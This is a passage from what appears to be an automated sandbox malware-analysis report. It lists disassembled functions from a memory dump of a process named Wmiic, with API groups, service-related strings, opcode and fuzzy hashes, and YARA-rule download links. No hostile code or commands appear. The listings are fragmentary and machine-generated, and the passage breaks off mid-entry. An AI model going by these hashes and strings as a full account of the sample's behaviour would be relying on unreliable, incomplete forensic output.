                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1A61A4326006809AEB229F66D4407DC77A6F74CBE8F540A29FF1957BE8DB78CD458340
                                                                                                                                                                                                    Function 0000000140001080 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 46memoryCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001F.00000002.1888546922.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888531338.0000000140000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888574423.0000000140026000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140030000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140062000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888651556.0000000140065000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_140000000_Wmiic.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Heap$AllocFreeLocalProcess_snwprintf_s_vfwprintf_p
                                                                                                                                                                                                    • String ID: %s\%s$NT Service$name$virtual_account
                                                                                                                                                                                                    • API String ID: 1628691493-1293189587
                                                                                                                                                                                                    • Opcode ID: db52c54a1bd37a6a99ec5c8299a3637e23c77f5368cde7bf9e39c4659f78377e
                                                                                                                                                                                                    • Instruction ID: 847d56988c11ccff595402cc5be1d1d2c3e50c9f6037e04ff214d1465cb41b48
                                                                                                                                                                                                    • Opcode Fuzzy Hash: db52c54a1bd37a6a99ec5c8299a3637e23c77f5368cde7bf9e39c4659f78377e
                                                                                                                                                                                                    • Instruction Fuzzy Hash: E3112B35604A9591EA01DB66B5003CAA7A0E789BF8F944326EF6C03BF8DE38C5468700
                                                                                                                                                                                                    Function 000000014002146C Relevance: 12.1, APIs: 8, Instructions: 89COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001F.00000002.1888546922.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888531338.0000000140000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888574423.0000000140026000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140030000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140062000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888651556.0000000140065000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_140000000_Wmiic.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: __doserrno_errno
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 921712934-0
                                                                                                                                                                                                    • Opcode ID: 9fc55764f17a8406dbba09a3720a64057b246b12ec7cfc6bc9a52da6b6c1052d
                                                                                                                                                                                                    • Instruction ID: 9b1ae2692c7aa1f797c30d2a7736f9f56704421511a9f923b1d78b963cf8b70d
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9fc55764f17a8406dbba09a3720a64057b246b12ec7cfc6bc9a52da6b6c1052d
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 88319E32610A5085E7139FA7A8417ED7555A7C8BF0F554719FF3A0B7E2CB3988428B04
                                                                                                                                                                                                    Function 0000000140017950 Relevance: 12.1, APIs: 2, Strings: 6, Instructions: 63COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001F.00000002.1888546922.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888531338.0000000140000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888574423.0000000140026000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140030000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140062000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888651556.0000000140065000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_140000000_Wmiic.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID: SERVICE_FILE_SYSTEM_DRIVER$SERVICE_INTERACTIVE_PROCESS$SERVICE_KERNEL_DRIVER$SERVICE_WIN32_OWN_PROCESS$SERVICE_WIN32_SHARE_PROCESS$SERVICE_WIN32_SHARE_PROCESS|SERVICE_INTERACTIVE_PROCESS
                                                                                                                                                                                                    • API String ID: 0-2402770260
                                                                                                                                                                                                    • Opcode ID: 16b709bc6346c575211078ab4dfa56cc102608930ce32e59cc0a2d25995df4d4
                                                                                                                                                                                                    • Instruction ID: 23a8490cfe90f1c2a308090e366f6a85ca121b180c663b3a352cc601f3572310
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 16b709bc6346c575211078ab4dfa56cc102608930ce32e59cc0a2d25995df4d4
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 01217C75524680C1F6678B67A804BE86271AB5C7D0FD51502FF0E5BAF0CB39CE889301
                                                                                                                                                                                                    Function 00000001400144B0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 126COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001F.00000002.1888546922.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888531338.0000000140000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888574423.0000000140026000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140030000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140062000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888651556.0000000140065000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_140000000_Wmiic.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID: %lu$%s set %s %s %s$%s set %s %s %s %s
                                                                                                                                                                                                    • API String ID: 0-1795435707
                                                                                                                                                                                                    • Opcode ID: 7eaeb9f95fd18fb7197ea1527400dc4321b66208a513659367c1991a4ac879e3
                                                                                                                                                                                                    • Instruction ID: 054e451fad24e7065109f3f0b029d0dd47eea46ddc6e4fcf6589d200fc340022
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7eaeb9f95fd18fb7197ea1527400dc4321b66208a513659367c1991a4ac879e3
                                                                                                                                                                                                    • Instruction Fuzzy Hash: C251C2B1618A8052FB32DB26A4517DA2290F7497F8F901322FF794BAF9DB39C641C700
                                                                                                                                                                                                    Function 000000014001F086 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 67COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001F.00000002.1888546922.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888531338.0000000140000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888574423.0000000140026000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140030000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140062000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888651556.0000000140065000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_140000000_Wmiic.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _getptd$ExceptionRaise
                                                                                                                                                                                                    • String ID: csm
                                                                                                                                                                                                    • API String ID: 2255768072-1018135373
                                                                                                                                                                                                    • Opcode ID: faddf5dcd7db62c195a203077242433b8dd42f1278d6c606382e79f7e625ce9f
                                                                                                                                                                                                    • Instruction ID: e8565f7666dcd684ddfdf79a9db708bd8ef6147b54f82e3b1904922039863616
                                                                                                                                                                                                    • Opcode Fuzzy Hash: faddf5dcd7db62c195a203077242433b8dd42f1278d6c606382e79f7e625ce9f
                                                                                                                                                                                                    • Instruction Fuzzy Hash: D7315032200780C2E662DF12E008BEE7365F79DBE1F454226EF5A0B7A5CB36C845CB00
                                                                                                                                                                                                    Function 000000014001A834 Relevance: 10.6, APIs: 7, Instructions: 60COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _FF_MSGBANNER.LIBCMT ref: 000000014001A85B
                                                                                                                                                                                                      • Part of subcall function 000000014001DBB8: GetModuleFileNameA.KERNEL32(?,?,?,?,?,000000014001DE14,?,?,?,?,0000000140020721,?,?,00000000,000000014001A304), ref: 000000014001DC7B
                                                                                                                                                                                                      • Part of subcall function 0000000140018E48: ExitProcess.KERNEL32 ref: 0000000140018E57
                                                                                                                                                                                                      • Part of subcall function 000000014001A2E0: malloc.LIBCMT ref: 000000014001A2FF
                                                                                                                                                                                                      • Part of subcall function 000000014001A2E0: Sleep.KERNEL32(?,?,00000000,000000014001A895,?,?,00000000,000000014001A93F,?,?,?,?,?,?,00000000,000000014001C67C), ref: 000000014001A316
                                                                                                                                                                                                    • _errno.LIBCMT ref: 000000014001A89D
                                                                                                                                                                                                    • _lock.LIBCMT ref: 000000014001A8B1
                                                                                                                                                                                                    • free.LIBCMT ref: 000000014001A8D3
                                                                                                                                                                                                    • _errno.LIBCMT ref: 000000014001A8D8
                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?,?,00000000,000000014001A93F,?,?,?,?,?,?,00000000,000000014001C67C,?,?,00000000,000000014001B8C5), ref: 000000014001A8FE
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001F.00000002.1888546922.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888531338.0000000140000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888574423.0000000140026000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140030000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140062000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888651556.0000000140065000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_140000000_Wmiic.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno$CriticalExitFileLeaveModuleNameProcessSectionSleep_lockfreemalloc
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1024173049-0
                                                                                                                                                                                                    • Opcode ID: 38d849c52648fc9d2f246203aa3df0cab8fff866c3e226c9577cc6293a230bc0
                                                                                                                                                                                                    • Instruction ID: 808b59fbf07043b202a3597875559d9e6a470724fff9b57267105a538d5de662
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 38d849c52648fc9d2f246203aa3df0cab8fff866c3e226c9577cc6293a230bc0
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6A219031A1468082F667AB13A5043EE6394E78E7C4F544235FB4A4F7E6CF7DC8819740
                                                                                                                                                                                                    Function 00000001400140E0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 57memoryCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001F.00000002.1888546922.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888531338.0000000140000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888574423.0000000140026000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140030000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140062000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888651556.0000000140065000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_140000000_Wmiic.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Heap$Process$AllocFree_snwprintf_s
                                                                                                                                                                                                    • String ID: value_from_string()
                                                                                                                                                                                                    • API String ID: 734457407-962593079
                                                                                                                                                                                                    • Opcode ID: 5d32141a8bc92d703f82d54b54d365e21bbe7b70d0b13f31b779d850a6f6be77
                                                                                                                                                                                                    • Instruction ID: 5240c5b56838f1c33d0c176e021e5deb61c2839be4d9d6ecac02f0754599868e
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5d32141a8bc92d703f82d54b54d365e21bbe7b70d0b13f31b779d850a6f6be77
                                                                                                                                                                                                    • Instruction Fuzzy Hash: B3213675201B8091E7129F62A81039AB7A0FB9DBE4F544729FFA9477F9DF39C5418700
                                                                                                                                                                                                    Function 0000000140002900 Relevance: 10.5, APIs: 7, Instructions: 32COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001F.00000002.1888546922.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888531338.0000000140000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888574423.0000000140026000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140030000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140062000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888651556.0000000140065000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_140000000_Wmiic.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Item$EnableWindow
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1115945535-0
                                                                                                                                                                                                    • Opcode ID: fdb9829a3620f13d7b2969ddaf86a420751a5d1716256729c1b6106c74bd120c
                                                                                                                                                                                                    • Instruction ID: c136e8dc2aac8da60112be9b768c9bef934fbc30f7073625e23f517483f65cae
                                                                                                                                                                                                    • Opcode Fuzzy Hash: fdb9829a3620f13d7b2969ddaf86a420751a5d1716256729c1b6106c74bd120c
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5A01B639705A9083EB169F63F85C3A66362BBCCBD1F10402AEB4A43775CE3CC8498211
                                                                                                                                                                                                    Function 0000000140015860 Relevance: 10.1, APIs: 8, Instructions: 108COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001F.00000002.1888546922.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888531338.0000000140000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888574423.0000000140026000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140030000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140062000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888651556.0000000140065000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_140000000_Wmiic.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                    • Opcode ID: d548c75a0ed2e4c1805d9124e181d2351554d6c8adaf4f69c5fa43727eebfa3e
                                                                                                                                                                                                    • Instruction ID: dd426357a1b9a04df74fbf9960fc75dfd2c65e8efc1bf2d2ec49ae87e7355242
                                                                                                                                                                                                    • Opcode Fuzzy Hash: d548c75a0ed2e4c1805d9124e181d2351554d6c8adaf4f69c5fa43727eebfa3e
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9A415E76A14A80C2EB51AB23A4003DA67A1F78DBE4F584116FF4D5B7B8EF39C491CB40
                                                                                                                                                                                                    Function 0000000140002840 Relevance: 9.0, APIs: 6, Instructions: 46COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001F.00000002.1888546922.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888531338.0000000140000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888574423.0000000140026000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140030000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140062000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888651556.0000000140065000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_140000000_Wmiic.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Resource$Find$CreateDefaultDialogErrorIndirectLangLastLoadParamUser
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 940021595-0
                                                                                                                                                                                                    • Opcode ID: fed401cc8e8f5612569b6891206cde108573bd67a878dd979692201b7d3e6802
                                                                                                                                                                                                    • Instruction ID: 9944d1bd91ac6ef74c3327299d60d6f918d01a8079eaa409e9ba49cf5d91b016
                                                                                                                                                                                                    • Opcode Fuzzy Hash: fed401cc8e8f5612569b6891206cde108573bd67a878dd979692201b7d3e6802
                                                                                                                                                                                                    • Instruction Fuzzy Hash: F601887570578082EB165B63B80479AA360BB4CFC0F18843DAF89437B4DF3CD8418750
                                                                                                                                                                                                    Function 0000000140017030 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 176COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001F.00000002.1888546922.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888531338.0000000140000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888574423.0000000140026000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140030000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140062000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888651556.0000000140065000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_140000000_Wmiic.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID: LocalSystem
                                                                                                                                                                                                    • API String ID: 0-3718507506
                                                                                                                                                                                                    • Opcode ID: 5c510378ff35a3638561cda51b730c846dcb0c7f476201026cba6af3d87a6302
                                                                                                                                                                                                    • Instruction ID: 4fab973e0ab3922536d0106af51d2d3be6949260d5916859e64fc5ce486037cb
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5c510378ff35a3638561cda51b730c846dcb0c7f476201026cba6af3d87a6302
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6E618031305B8481FA62DB27A8007DB66E4BB8DBE4F584625BF6D4BBE5EF39C4418700
                                                                                                                                                                                                    Function 0000000140017420 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 141COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001F.00000002.1888546922.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888531338.0000000140000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888574423.0000000140026000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140030000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140062000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888651556.0000000140065000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_140000000_Wmiic.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID: %s
                                                                                                                                                                                                    • API String ID: 0-620797490
                                                                                                                                                                                                    • Opcode ID: 99855a48316195b93616fbf83ab77e05beff4dc8f3728702d7539ec089a948fa
                                                                                                                                                                                                    • Instruction ID: 432093541ee24ec42a9dad4126288decd4c7b585e2e55cd77d9abcda1cabd02e
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 99855a48316195b93616fbf83ab77e05beff4dc8f3728702d7539ec089a948fa
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5E51C072210B8086FB229B22A8407DA66A5F78DBD4F540225FF5D4BBF6DF39C941C300
                                                                                                                                                                                                    Function 000000014001EC58 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 18COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001F.00000002.1888546922.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888531338.0000000140000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888574423.0000000140026000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140030000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140062000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888651556.0000000140065000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_140000000_Wmiic.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _getptd
                                                                                                                                                                                                    • String ID: MOC$csm
                                                                                                                                                                                                    • API String ID: 3186804695-1389381023
                                                                                                                                                                                                    • Opcode ID: bf3a03d5970d1dd3e1fb6bd408ba9de5847db261f06e21d03137f6bf29761363
                                                                                                                                                                                                    • Instruction ID: 392b93139b50625e4f00c751eea5d7909c54f268b14a004c93ea04d22c7197c5
                                                                                                                                                                                                    • Opcode Fuzzy Hash: bf3a03d5970d1dd3e1fb6bd408ba9de5847db261f06e21d03137f6bf29761363
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 75E04F36911180C6E7272B66C4453EC36E0FB9C789F86A060A3444B3A3CBBEC4818A52
                                                                                                                                                                                                    Function 0000000140011450 Relevance: 7.6, APIs: 5, Instructions: 102COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001F.00000002.1888546922.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888531338.0000000140000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888574423.0000000140026000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140030000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140062000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888651556.0000000140065000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_140000000_Wmiic.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CriticalSectionServiceStatus$EnterLeaveUnregisterWait
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 750648178-0
                                                                                                                                                                                                    • Opcode ID: da6eaf891d5f39c178a9daca24e1f4e62401406960aaf2683fab0f1a6af88cc5
                                                                                                                                                                                                    • Instruction ID: 64d843524deb2b9263129e994287159644b8f218d23b3c23ad896588e56a0bad
                                                                                                                                                                                                    • Opcode Fuzzy Hash: da6eaf891d5f39c178a9daca24e1f4e62401406960aaf2683fab0f1a6af88cc5
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 26519AB6904B86C6E769DB22F4513DBB7A4F3887C8F040215EB9A073A5DB7DD949CB00
                                                                                                                                                                                                    Function 0000000140017D40 Relevance: 7.6, APIs: 6, Instructions: 74memoryCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001F.00000002.1888546922.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888531338.0000000140000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888574423.0000000140026000.00000002.00000001.01000000.0000000A.sdmpDownload File
